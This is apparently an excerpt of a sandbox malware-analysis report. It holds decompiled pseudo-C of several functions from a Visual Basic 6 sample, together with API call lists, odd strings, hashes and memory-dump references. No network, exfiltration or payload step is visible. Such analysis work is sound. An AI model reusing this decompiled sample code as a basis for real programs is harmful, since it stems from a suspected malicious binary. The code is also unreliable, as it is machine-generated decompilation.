              • Opcode Fuzzy Hash: 32cc7d09358a9419ff020fce86781d796007d4f97e8f5ddd26b8dcfb9473f2fe
              • Instruction Fuzzy Hash: E941E6B1D00248AFCB00EF95C945BDDBBB4AF04744F10842AF105BB1A1D779A985DB58
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00415B68, Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 79COMMON
              Download Yara Rule
              C-Code - Quality: 50%
              			E00415B68(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v36;
				char* _v44;
				intOrPtr _v52;
				intOrPtr _v76;
				intOrPtr _v84;
				short _v104;
				char _v108;
				short _v112;
				short _t30;
				short _t36;
				void* _t47;
				void* _t49;
				intOrPtr _t50;

				_t50 = _t49 - 0xc;
				 *[fs:0x0] = _t50;
				L004016F0();
				_v16 = _t50;
				_v12 = 0x401588;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x60,  *[fs:0x0], 0x4016f6, _t47);
				L004017EC();
				_v108 = 0x98e72e79;
				_push( &_v108);
				_push(L"Bride6");
				_t30 =  &_v36;
				_push(_t30);
				L004018D6();
				_push(_t30);
				E00411544();
				_v104 = _t30;
				L004018D0();
				asm("sbb eax, eax");
				_v112 =  ~( ~(_v104 - 0x3b15e5) + 1);
				L00401924();
				_t36 = _v112;
				if(_t36 != 0) {
					_v44 = L"Spndingsfelts7";
					_v52 = 8;
					_v76 = 0x98e72e79;
					_v84 = 3;
					_push(0x10);
					L004016F0();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t36 = 0x10;
					L004016F0();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_push(2);
					_push(L"IyvnZebsGDOjb7EbCSqY69I5dIvuQxd72");
					_push(_v32);
					L004018FA();
				}
				_v28 =  *0x401580;
				asm("wait");
				_push(0x415c6c);
				L004018AC();
				return _t36;
			}





















              0x00415b6b
              0x00415b7a
              0x00415b84
              0x00415b8c
              0x00415b8f
              0x00415b96
              0x00415ba5
              0x00415ba8
              0x00415bad
              0x00415bb7
              0x00415bb8
              0x00415bbd
              0x00415bc0
              0x00415bc1
              0x00415bc6
              0x00415bc7
              0x00415bcc
              0x00415bd0
              0x00415be0
              0x00415be5
              0x00415bec
              0x00415bf1
              0x00415bf7
              0x00415bf9
              0x00415c00
              0x00415c07
              0x00415c0e
              0x00415c15
              0x00415c18
              0x00415c22
              0x00415c23
              0x00415c24
              0x00415c25
              0x00415c28
              0x00415c29
              0x00415c33
              0x00415c34
              0x00415c35
              0x00415c36
              0x00415c37
              0x00415c39
              0x00415c3e
              0x00415c41
              0x00415c46
              0x00415c4f
              0x00415c52
              0x00415c53
              0x00415c66
              0x00415c6b

              APIs
              • __vbaChkstk.MSVBVM60(?,004016F6), ref: 00415B84
              • #598.MSVBVM60(?,?,?,?,004016F6), ref: 00415BA8
              • __vbaStrToAnsi.MSVBVM60(?,Bride6,98E72E79), ref: 00415BC1
              • __vbaSetSystemError.MSVBVM60(00000000,?,Bride6,98E72E79), ref: 00415BD0
              • __vbaFreeStr.MSVBVM60(00000000,?,Bride6,98E72E79), ref: 00415BEC
              • __vbaChkstk.MSVBVM60(00000000,?,Bride6,98E72E79), ref: 00415C18
              • __vbaChkstk.MSVBVM60(00000000,?,Bride6,98E72E79), ref: 00415C29
              • __vbaLateMemCall.MSVBVM60(?,IyvnZebsGDOjb7EbCSqY69I5dIvuQxd72,00000002,00000000,?,Bride6,98E72E79), ref: 00415C41
              • __vbaFreeObj.MSVBVM60(00415C6C,00000000,?,Bride6,98E72E79), ref: 00415C66
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.474162328.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000001.00000002.474147086.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.474224879.0000000000418000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.474240187.000000000041A000.00000002.00020000.sdmp Download File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_400000_udmugning.jbxd
              Yara matches
              Similarity
              • API ID: __vba$Chkstk$Free$#598AnsiCallErrorLateSystem
              • String ID: Bride6$IyvnZebsGDOjb7EbCSqY69I5dIvuQxd72$Spndingsfelts7
              • API String ID: 3513344361-1204764921
              • Opcode ID: 89d8d2d1dbb47e0a1ebb1faac124ae67c4583e256c45e1d3c171793b1fcb872c
              • Instruction ID: 089eb8cef898d4bfa41b329a60f2fc1421607c06fe2e854fc46b985b11637515
              • Opcode Fuzzy Hash: 89d8d2d1dbb47e0a1ebb1faac124ae67c4583e256c45e1d3c171793b1fcb872c
              • Instruction Fuzzy Hash: 8D216D71D50708AACF01EFA5CC46BDEBBB9AF05B04F10442AF500BF2A1D7B99545CB48
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00416106, Relevance: 19.6, APIs: 13, Instructions: 110COMMON
              Download Yara Rule
              C-Code - Quality: 53%
              			E00416106(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4, void* _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v24;
				void* _v28;
				signed int _v32;
				void* _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr* _v48;
				signed int _v52;
				signed int _v60;
				intOrPtr* _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _t59;
				signed int _t64;
				signed int _t65;
				intOrPtr _t81;

				_push(0x4016f6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t81;
				_push(0x38);
				L004016F0();
				_v12 = _t81;
				_v8 = 0x4015c8;
				L004018F4();
				if( *0x4183d8 != 0) {
					_v64 = 0x4183d8;
				} else {
					_push(0x4183d8);
					_push(0x4119c8);
					L004018C4();
					_v64 = 0x4183d8;
				}
				_v40 =  *_v64;
				_t59 =  *((intOrPtr*)( *_v40 + 0x14))(_v40,  &_v36);
				asm("fclex");
				_v44 = _t59;
				if(_v44 >= 0) {
					_v68 = _v68 & 0x00000000;
				} else {
					_push(0x14);
					_push(0x4119b8);
					_push(_v40);
					_push(_v44);
					L00401906();
					_v68 = _t59;
				}
				_v48 = _v36;
				_t64 =  *((intOrPtr*)( *_v48 + 0xd8))(_v48,  &_v32);
				asm("fclex");
				_v52 = _t64;
				if(_v52 >= 0) {
					_v72 = _v72 & 0x00000000;
				} else {
					_push(0xd8);
					_push(0x411b34);
					_push(_v48);
					_push(_v52);
					L00401906();
					_v72 = _t64;
				}
				_t65 = _v32;
				_v60 = _t65;
				_t35 =  &_v32;
				 *_t35 = _v32 & 0x00000000;
				L00401882();
				L004018AC();
				L004017C8();
				L0040193C();
				asm("fcomp qword [0x401548]");
				asm("fnstsw ax");
				asm("sahf");
				if( *_t35 != 0) {
					L0040183A();
					_t65 =  *((intOrPtr*)( *_a4 + 0x64))(_a4, _t65);
					asm("fclex");
					_v40 = _t65;
					if(_v40 >= 0) {
						_v76 = _v76 & 0x00000000;
					} else {
						_push(0x64);
						_push(0x41046c);
						_push(_a4);
						_push(_v40);
						L00401906();
						_v76 = _t65;
					}
				}
				asm("wait");
				_push(0x416283);
				L00401924();
				L00401924();
				return _t65;
			}






















              0x0041610b
              0x00416116
              0x00416117
              0x0041611e
              0x00416121
              0x00416129
              0x0041612c
              0x00416139
              0x00416145
              0x0041615f
              0x00416147
              0x00416147
              0x0041614c
              0x00416151
              0x00416156
              0x00416156
              0x0041616b
              0x0041617a
              0x0041617d
              0x0041617f
              0x00416186
              0x0041619f
              0x00416188
              0x00416188
              0x0041618a
              0x0041618f
              0x00416192
              0x00416195
              0x0041619a
              0x0041619a
              0x004161a6
              0x004161b5
              0x004161bb
              0x004161bd
              0x004161c4
              0x004161e0
              0x004161c6
              0x004161c6
              0x004161cb
              0x004161d0
              0x004161d3
              0x004161d6
              0x004161db
              0x004161db
              0x004161e4
              0x004161e7
              0x004161ea
              0x004161ea
              0x004161f4
              0x004161fc
              0x00416207
              0x0041620c
              0x00416211
              0x00416217
              0x00416219
              0x0041621a
              0x00416222
              0x00416230
              0x00416233
              0x00416235
              0x0041623c
              0x00416255
              0x0041623e
              0x0041623e
              0x00416240
              0x00416245
              0x00416248
              0x0041624b
              0x00416250
              0x00416250
              0x0041623c
              0x00416259
              0x0041625a
              0x00416275
              0x0041627d
              0x00416282

              APIs
              • __vbaChkstk.MSVBVM60(?,004016F6), ref: 00416121
              • __vbaStrCopy.MSVBVM60(?,?,?,?,004016F6), ref: 00416139
              • __vbaNew2.MSVBVM60(004119C8,004183D8,?,?,?,?,004016F6), ref: 00416151
              • __vbaHresultCheckObj.MSVBVM60(00000000,?,004119B8,00000014), ref: 00416195
              • __vbaHresultCheckObj.MSVBVM60(00000000,?,00411B34,000000D8), ref: 004161D6
              • __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004016F6), ref: 004161F4
              • __vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004016F6), ref: 004161FC
              • __vbaFPInt.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004016F6), ref: 00416207
              • __vbaFpR8.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004016F6), ref: 0041620C
              • __vbaFpI4.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004016F6), ref: 00416222
              • __vbaHresultCheckObj.MSVBVM60(00000000,?,0041046C,00000064), ref: 0041624B
              • __vbaFreeStr.MSVBVM60(00416283,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004016F6), ref: 00416275
              • __vbaFreeStr.MSVBVM60(00416283,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004016F6), ref: 0041627D
              Memory Dump Source
              • Source File: 00000001.00000002.474162328.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000001.00000002.474147086.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.474224879.0000000000418000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.474240187.000000000041A000.00000002.00020000.sdmp Download File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_400000_udmugning.jbxd
              Yara matches
              Similarity
              • API ID: __vba$CheckFreeHresult$ChkstkCopyMoveNew2
              • String ID:
              • API String ID: 1785689987-0
              • Opcode ID: 9b3d31325408d3ccec663913946f46a5490b795ac003c6b42a7808e968a65fcd
              • Instruction ID: a348fe4d4398cec5f4b974d72edd72d2de2d81a9126ee82877270f6ac5d308b2
              • Opcode Fuzzy Hash: 9b3d31325408d3ccec663913946f46a5490b795ac003c6b42a7808e968a65fcd
              • Instruction Fuzzy Hash: CA41C271900208EFCB00EF95C945BDEBBB5BF08705F10806AF505B62A1DB79A985DB69
              Uniqueness

              Uniqueness Score: -1.00%

              Function 0041538B, Relevance: 18.1, APIs: 12, Instructions: 120COMMON
              Download Yara Rule
              C-Code - Quality: 52%
              			E0041538B(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _v32;
				signed int _v36;
				void* _v40;
				char _v56;
				char _v72;
				intOrPtr _v96;
				intOrPtr _v104;
				intOrPtr _v112;
				char _v120;
				void* _v124;
				signed int _v128;
				intOrPtr* _v132;
				signed int _v136;
				intOrPtr _v144;
				intOrPtr* _v148;
				signed int _v152;
				signed int _v156;
				short _t63;
				signed int _t66;
				signed int _t72;
				signed int _t78;
				intOrPtr _t93;

				_push(0x4016f6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t93;
				L004016F0();
				_v12 = _t93;
				_v8 = 0x401530;
				_v96 = 0x411918;
				_v104 = 8;
				L004018A0();
				_push(0);
				_push(3);
				_push( &_v56);
				_push( &_v72);
				L00401810();
				_v112 = 0x411bb0;
				_v120 = 0x8008;
				_push( &_v72);
				_t63 =  &_v120;
				_push(_t63);
				L00401828();
				_v124 = _t63;
				_push( &_v72);
				_push( &_v56);
				_push(2);
				L00401942();
				_t66 = _v124;
				if(_t66 != 0) {
					if( *0x4183d8 != 0) {
						_v148 = 0x4183d8;
					} else {
						_push(0x4183d8);
						_push(0x4119c8);
						L004018C4();
						_v148 = 0x4183d8;
					}
					_v124 =  *_v148;
					_t72 =  *((intOrPtr*)( *_v124 + 0x1c))(_v124,  &_v40);
					asm("fclex");
					_v128 = _t72;
					if(_v128 >= 0) {
						_v152 = _v152 & 0x00000000;
					} else {
						_push(0x1c);
						_push(0x4119b8);
						_push(_v124);
						_push(_v128);
						L00401906();
						_v152 = _t72;
					}
					_v132 = _v40;
					_v96 = 0x80020004;
					_v104 = 0xa;
					L004016F0();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t78 =  *((intOrPtr*)( *_v132 + 0x5c))(_v132, 0x10,  &_v36);
					asm("fclex");
					_v136 = _t78;
					if(_v136 >= 0) {
						_v156 = _v156 & 0x00000000;
					} else {
						_push(0x5c);
						_push(0x411b0c);
						_push(_v132);
						_push(_v136);
						L00401906();
						_v156 = _t78;
					}
					_t66 = _v36;
					_v144 = _t66;
					_v36 = _v36 & 0x00000000;
					L00401882();
					L004018AC();
				}
				_v28 = 0x190d6de0;
				_v24 = 0x5b03;
				_push(0x415566);
				L00401924();
				return _t66;
			}





























              0x00415390
              0x0041539b
              0x0041539c
              0x004153a8
              0x004153b0
              0x004153b3
              0x004153ba
              0x004153c1
              0x004153ce
              0x004153d3
              0x004153d5
              0x004153da
              0x004153de
              0x004153df
              0x004153e4
              0x004153eb
              0x004153f5
              0x004153f6
              0x004153f9
              0x004153fa
              0x004153ff
              0x00415406
              0x0041540a
              0x0041540b
              0x0041540d
              0x00415415
              0x0041541b
              0x00415428
              0x00415445
              0x0041542a
              0x0041542a
              0x0041542f
              0x00415434
              0x00415439
              0x00415439
              0x00415457
              0x00415466
              0x00415469
              0x0041546b
              0x00415472
              0x0041548e
              0x00415474
              0x00415474
              0x00415476
              0x0041547b
              0x0041547e
              0x00415481
              0x00415486
              0x00415486
              0x00415498
              0x0041549b
              0x004154a2
              0x004154b0
              0x004154ba
              0x004154bb
              0x004154bc
              0x004154bd
              0x004154c6
              0x004154c9
              0x004154cb
              0x004154d8
              0x004154f7
              0x004154da
              0x004154da
              0x004154dc
              0x004154e1
              0x004154e4
              0x004154ea
              0x004154ef
              0x004154ef
              0x004154fe
              0x00415501
              0x00415507
              0x00415514
              0x0041551c
              0x0041551c
              0x00415521
              0x00415528
              0x0041552f
              0x00415560
              0x00415565

              APIs
              • __vbaChkstk.MSVBVM60(?,004016F6), ref: 004153A8
              • __vbaVarDup.MSVBVM60 ref: 004153CE
              • #717.MSVBVM60(?,?,00000003,00000000), ref: 004153DF
              • __vbaVarTstNe.MSVBVM60(00008008,?,?,?,00000003,00000000), ref: 004153FA
              • __vbaFreeVarList.MSVBVM60(00000002,?,?,00008008,?,?,?,00000003,00000000), ref: 0041540D
              • __vbaNew2.MSVBVM60(004119C8,004183D8), ref: 00415434
              • __vbaHresultCheckObj.MSVBVM60(00000000,?,004119B8,0000001C), ref: 00415481
              • __vbaChkstk.MSVBVM60(?), ref: 004154B0
              • __vbaHresultCheckObj.MSVBVM60(00000000,?,00411B0C,0000005C), ref: 004154EA
              • __vbaStrMove.MSVBVM60(00000000,?,00411B0C,0000005C), ref: 00415514
              • __vbaFreeObj.MSVBVM60(00000000,?,00411B0C,0000005C), ref: 0041551C
              • __vbaFreeStr.MSVBVM60(00415566), ref: 00415560
              Memory Dump Source
              • Source File: 00000001.00000002.474162328.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000001.00000002.474147086.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.474224879.0000000000418000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.474240187.000000000041A000.00000002.00020000.sdmp Download File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_400000_udmugning.jbxd
              Yara matches
              Similarity
              • API ID: __vba$Free$CheckChkstkHresult$#717ListMoveNew2
              • String ID:
              • API String ID: 2511207350-0
              • Opcode ID: ae877c57432e6425abc9b3d49ada0ff2f118fc6f4397ffce2c9b4c7cd606607d
              • Instruction ID: 04972f1905e53d492421302db4cb8c68c06e0f31ed89efe14389994f46a5ca8e
              • Opcode Fuzzy Hash: ae877c57432e6425abc9b3d49ada0ff2f118fc6f4397ffce2c9b4c7cd606607d
              • Instruction Fuzzy Hash: EB5118B1C00618DFDB10DFA4C945BDEBBB5BF04705F20846AE104BB2A1DB796A85CF58
              Uniqueness

              Uniqueness Score: -1.00%

              Function 0041500B, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 81COMMON
              Download Yara Rule
              C-Code - Quality: 55%
              			E0041500B(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags, char __fp0) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v24;
				intOrPtr _v32;
				char _v40;
				char _v48;
				char _v56;
				char* _v64;
				char _v72;
				short _v92;
				signed int _v100;
				char* _t33;
				intOrPtr _t46;

				_push(0x4016f6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t46;
				_push(0x50);
				L004016F0();
				_v12 = _t46;
				_v8 = 0x401510;
				_v48 = 0x80020004;
				_v56 = 0xa;
				_v32 = 0x80020004;
				_v40 = 0xa;
				_push( &_v56);
				_push( &_v40);
				asm("fld1");
				_v48 = __fp0;
				asm("fld1");
				_v56 = __fp0;
				asm("fld1");
				_v64 = __fp0;
				asm("fld1");
				_v72 = __fp0;
				L0040181C();
				L0040193C();
				asm("fcomp qword [0x401508]");
				asm("fnstsw ax");
				asm("sahf");
				if(__eflags == 0) {
					_t10 =  &_v100;
					 *_t10 = _v100 & 0x00000000;
					__eflags =  *_t10;
				} else {
					_v100 = 1;
				}
				_v92 =  ~_v100;
				_push( &_v56);
				_push( &_v40);
				_push(2);
				L00401942();
				_t33 = _v92;
				if(_t33 != 0) {
					_v64 = L"samtaleemnetsrhes";
					_v72 = 8;
					L004018A0();
					_t33 =  &_v40;
					_push(_t33);
					L00401816();
					L00401882();
					L00401912();
				}
				asm("wait");
				_push(0x415115);
				L00401924();
				return _t33;
			}
















              0x00415010
              0x0041501b
              0x0041501c
              0x00415023
              0x00415026
              0x0041502e
              0x00415031
              0x00415038
              0x0041503f
              0x00415046
              0x0041504d
              0x00415057
              0x0041505b
              0x0041505c
              0x00415060
              0x00415063
              0x00415067
              0x0041506a
              0x0041506e
              0x00415071
              0x00415075
              0x00415078
              0x0041507d
              0x00415082
              0x00415088
              0x0041508a
              0x0041508b
              0x00415096
              0x00415096
              0x00415096
              0x0041508d
              0x0041508d
              0x0041508d
              0x0041509f
              0x004150a6
              0x004150aa
              0x004150ab
              0x004150ad
              0x004150b5
              0x004150bb
              0x004150bd
              0x004150c4
              0x004150d1
              0x004150d6
              0x004150d9
              0x004150da
              0x004150e4
              0x004150ec
              0x004150ec
              0x004150f1
              0x004150f2
              0x0041510f
              0x00415114

              APIs
              • __vbaChkstk.MSVBVM60(?,004016F6), ref: 00415026
              • #675.MSVBVM60(?,?,?,?,?,?,?,?,0000000A,0000000A), ref: 00415078
              • __vbaFpR8.MSVBVM60(?,?,?,?,?,?,?,?,0000000A,0000000A), ref: 0041507D
              • __vbaFreeVarList.MSVBVM60(00000002,0000000A,0000000A,?,?,?,?,?,?,?,?,0000000A,0000000A), ref: 004150AD
              • __vbaVarDup.MSVBVM60 ref: 004150D1
              • #667.MSVBVM60(?), ref: 004150DA
              • __vbaStrMove.MSVBVM60(?), ref: 004150E4
              • __vbaFreeVar.MSVBVM60(?), ref: 004150EC
              • __vbaFreeStr.MSVBVM60(00415115), ref: 0041510F
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.474162328.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000001.00000002.474147086.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.474224879.0000000000418000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.474240187.000000000041A000.00000002.00020000.sdmp Download File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_400000_udmugning.jbxd
              Yara matches
              Similarity
              • API ID: __vba$Free$#667#675ChkstkListMove
              • String ID: samtaleemnetsrhes
              • API String ID: 724837296-85822442
              • Opcode ID: 56b8cbc7db6f1966a7236ca0ab8f732e2e5ef0329cb5589b810e8a2bb47c8ca3
              • Instruction ID: b8096b4f7f27465fed98fc39583e144a8b96ba49ac16142ed3a429b2b7640774
              • Opcode Fuzzy Hash: 56b8cbc7db6f1966a7236ca0ab8f732e2e5ef0329cb5589b810e8a2bb47c8ca3
              • Instruction Fuzzy Hash: 01214DB1840608ABDB05EF91C956BEEB7B9EB44704F20452EF001B6191EBB96E44CB69
              Uniqueness

              Uniqueness Score: -1.00%

              Function 0041493A, Relevance: 15.1, APIs: 10, Instructions: 96COMMON
              Download Yara Rule
              C-Code - Quality: 41%
              			E0041493A(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v40;
				char _v44;
				char _v60;
				signed int _v80;
				signed int _v84;
				signed int _v96;
				intOrPtr* _v100;
				signed int _v104;
				char* _t48;
				signed int _t49;
				char* _t52;
				char* _t53;
				signed int _t58;
				void* _t68;
				void* _t70;
				intOrPtr _t71;

				_t71 = _t70 - 0xc;
				 *[fs:0x0] = _t71;
				L004016F0();
				_v16 = _t71;
				_v12 = 0x401488;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x50,  *[fs:0x0], 0x4016f6, _t68);
				if(0 != 0) {
					_t58 =  *((intOrPtr*)( *_a4 + 0x254))(_a4, 0xb);
					asm("fclex");
					_v80 = _t58;
					if(_v80 >= 0) {
						_v96 = _v96 & 0x00000000;
					} else {
						_push(0x254);
						_push(0x41046c);
						_push(_a4);
						_push(_v80);
						L00401906();
						_v96 = _t58;
					}
				}
				_v60 = 1;
				_t48 =  &_v60;
				_push(_t48);
				L00401864();
				_v80 =  ~(0 | _t48 != 0x0000ffff);
				L00401912();
				_t49 = _v80;
				if(_t49 != 0) {
					if( *0x4183d8 != 0) {
						_v100 = 0x4183d8;
					} else {
						_push(0x4183d8);
						_push(0x4119c8);
						L004018C4();
						_v100 = 0x4183d8;
					}
					_v80 =  *_v100;
					_t52 =  &_v40;
					L004018B8();
					_t53 =  &_v44;
					L004018BE();
					_t49 =  *((intOrPtr*)( *_v80 + 0x10))(_v80, _t53, _t53, _t52, _t52);
					asm("fclex");
					_v84 = _t49;
					if(_v84 >= 0) {
						_v104 = _v104 & 0x00000000;
					} else {
						_push(0x10);
						_push(0x4119b8);
						_push(_v80);
						_push(_v84);
						L00401906();
						_v104 = _t49;
					}
					L004018AC();
				}
				_push(0x414a86);
				L00401912();
				return _t49;
			}






















              0x0041493d
              0x0041494c
              0x00414956
              0x0041495e
              0x00414961
              0x00414968
              0x00414977
              0x0041497e
              0x0041498a
              0x00414990
              0x00414992
              0x00414999
              0x004149b5
              0x0041499b
              0x0041499b
              0x004149a0
              0x004149a5
              0x004149a8
              0x004149ab
              0x004149b0
              0x004149b0
              0x00414999
              0x004149b9
              0x004149c0
              0x004149c3
              0x004149c4
              0x004149d4
              0x004149db
              0x004149e0
              0x004149e6
              0x004149ef
              0x00414a09
              0x004149f1
              0x004149f1
              0x004149f6
              0x004149fb
              0x00414a00
              0x00414a00
              0x00414a15
              0x00414a18
              0x00414a1c
              0x00414a22
              0x00414a26
              0x00414a34
              0x00414a37
              0x00414a39
              0x00414a40
              0x00414a59
              0x00414a42
              0x00414a42
              0x00414a44
              0x00414a49
              0x00414a4c
              0x00414a4f
              0x00414a54
              0x00414a54
              0x00414a60
              0x00414a60
              0x00414a65
              0x00414a80
              0x00414a85

              APIs
              • __vbaChkstk.MSVBVM60(?,004016F6), ref: 00414956
              • __vbaHresultCheckObj.MSVBVM60(00000000,00401488,0041046C,00000254), ref: 004149AB
              • #560.MSVBVM60(00000001), ref: 004149C4
              • __vbaFreeVar.MSVBVM60(00000001), ref: 004149DB
              • __vbaNew2.MSVBVM60(004119C8,004183D8,00000001), ref: 004149FB
              • __vbaObjVar.MSVBVM60(?,?,?,?,?,?,?,?,?,?,00000001), ref: 00414A1C
              • __vbaObjSetAddref.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,00000001), ref: 00414A26
              • __vbaHresultCheckObj.MSVBVM60(00000000,?,004119B8,00000010,?,?,?,?,?,?,?,?,?,00000001), ref: 00414A4F
              • __vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,00000001), ref: 00414A60
              • __vbaFreeVar.MSVBVM60(00414A86,00000001), ref: 00414A80
              Memory Dump Source
              • Source File: 00000001.00000002.474162328.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000001.00000002.474147086.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.474224879.0000000000418000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.474240187.000000000041A000.00000002.00020000.sdmp Download File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_400000_udmugning.jbxd
              Yara matches
              Similarity
              • API ID: __vba$Free$CheckHresult$#560AddrefChkstkNew2
              • String ID:
              • API String ID: 70940770-0
              • Opcode ID: 8833c743e22b68355af3735ce1a7b6ae7b19ffad49e2490c38d407c7cdbbdb77
              • Instruction ID: e2129a97234b0513e1b74b64fc8439e56c26d28ce70e40ae1b6ea354d8a7422c
              • Opcode Fuzzy Hash: 8833c743e22b68355af3735ce1a7b6ae7b19ffad49e2490c38d407c7cdbbdb77
              • Instruction Fuzzy Hash: F03148B1D40208AFCB00EFA5C849BDEBBB4BF08744F10842AF415BB1A1D7B99985DF58
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00414BB3, Relevance: 15.1, APIs: 10, Instructions: 96COMMON
              Download Yara Rule
              C-Code - Quality: 56%
              			E00414BB3(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr __fp0) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v24;
				long long _v32;
				short _v36;
				void* _v40;
				void* _v44;
				void* _v48;
				void* _v52;
				signed int _v56;
				intOrPtr* _v60;
				signed int _v64;
				intOrPtr* _v72;
				signed int _v76;
				signed int _v80;
				signed int _t41;
				short _t45;
				signed int _t51;
				signed int _t56;
				intOrPtr _t67;

				_push(0x4016f6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t67;
				_t41 = 0x3c;
				L004016F0();
				_v12 = _t67;
				_v8 = 0x4014b8;
				L00401852();
				_v24 = __fp0;
				_push(0x411b00);
				L00401846();
				L00401882();
				_push(_t41);
				_push(0x411b08);
				L0040184C();
				asm("sbb eax, eax");
				_v52 =  ~( ~( ~_t41));
				L00401924();
				_t45 = _v52;
				if(_t45 != 0) {
					if( *0x4183d8 != 0) {
						_v72 = 0x4183d8;
					} else {
						_push(0x4183d8);
						_push(0x4119c8);
						L004018C4();
						_v72 = 0x4183d8;
					}
					_v52 =  *_v72;
					_t51 =  *((intOrPtr*)( *_v52 + 0x1c))(_v52,  &_v44);
					asm("fclex");
					_v56 = _t51;
					if(_v56 >= 0) {
						_v76 = _v76 & 0x00000000;
					} else {
						_push(0x1c);
						_push(0x4119b8);
						_push(_v52);
						_push(_v56);
						L00401906();
						_v76 = _t51;
					}
					_v60 = _v44;
					_t56 =  *((intOrPtr*)( *_v60 + 0x64))(_v60, 1,  &_v48);
					asm("fclex");
					_v64 = _t56;
					if(_v64 >= 0) {
						_v80 = _v80 & 0x00000000;
					} else {
						_push(0x64);
						_push(0x411b0c);
						_push(_v60);
						_push(_v64);
						L00401906();
						_v80 = _t56;
					}
					_t45 = _v48;
					_v36 = _t45;
					L004018AC();
				}
				_v32 =  *0x4014b0;
				asm("wait");
				_push(0x414cfc);
				return _t45;
			}























              0x00414bb8
              0x00414bc3
              0x00414bc4
              0x00414bcd
              0x00414bce
              0x00414bd6
              0x00414bd9
              0x00414be0
              0x00414be5
              0x00414be8
              0x00414bed
              0x00414bf7
              0x00414bfc
              0x00414bfd
              0x00414c02
              0x00414c09
              0x00414c0f
              0x00414c16
              0x00414c1b
              0x00414c21
              0x00414c2e
              0x00414c48
              0x00414c30
              0x00414c30
              0x00414c35
              0x00414c3a
              0x00414c3f
              0x00414c3f
              0x00414c54
              0x00414c63
              0x00414c66
              0x00414c68
              0x00414c6f
              0x00414c88
              0x00414c71
              0x00414c71
              0x00414c73
              0x00414c78
              0x00414c7b
              0x00414c7e
              0x00414c83
              0x00414c83
              0x00414c8f
              0x00414ca0
              0x00414ca3
              0x00414ca5
              0x00414cac
              0x00414cc5
              0x00414cae
              0x00414cae
              0x00414cb0
              0x00414cb5
              0x00414cb8
              0x00414cbb
              0x00414cc0
              0x00414cc0
              0x00414cc9
              0x00414ccd
              0x00414cd4
              0x00414cd4
              0x00414cdf
              0x00414ce2
              0x00414ce3
              0x00000000

              APIs
              • __vbaChkstk.MSVBVM60(?,004016F6), ref: 00414BCE
              • #535.MSVBVM60(?,?,?,?,004016F6), ref: 00414BE0
              • #527.MSVBVM60(00411B00,?,?,?,?,004016F6), ref: 00414BED
              • __vbaStrMove.MSVBVM60(00411B00,?,?,?,?,004016F6), ref: 00414BF7
              • __vbaStrCmp.MSVBVM60(00411B08,00000000,00411B00,?,?,?,?,004016F6), ref: 00414C02
